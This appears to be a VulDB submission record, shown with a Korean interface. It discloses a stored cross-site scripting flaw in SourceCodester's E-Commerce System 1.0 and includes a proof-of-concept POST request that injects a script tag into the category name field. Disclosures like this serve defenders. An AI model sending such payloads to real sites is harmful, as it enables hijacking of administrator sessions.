| 제목 | E-Commerce System category XSS |
|---|
| 설명 | E-Commerce System has a XSS vulnerability at /ecommerce/admin/category/controller.php,attackers can edit the category name with a xss payload , and it will be triggered when viewing the page /ecommerce/admin/category/index.php.
POC request below:
POST /ecommerce/admin/category/controller.php?action=edit HTTP/1.1
********************************
CATEGID=5&CATEGORY=SHOES%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E&save= |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 03. 20. AM 07:59 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 20. AM 08:33 (34 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223411 [SourceCodester E-Commerce System 1.0 Category Name controller.php 범주 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 19 |
|---|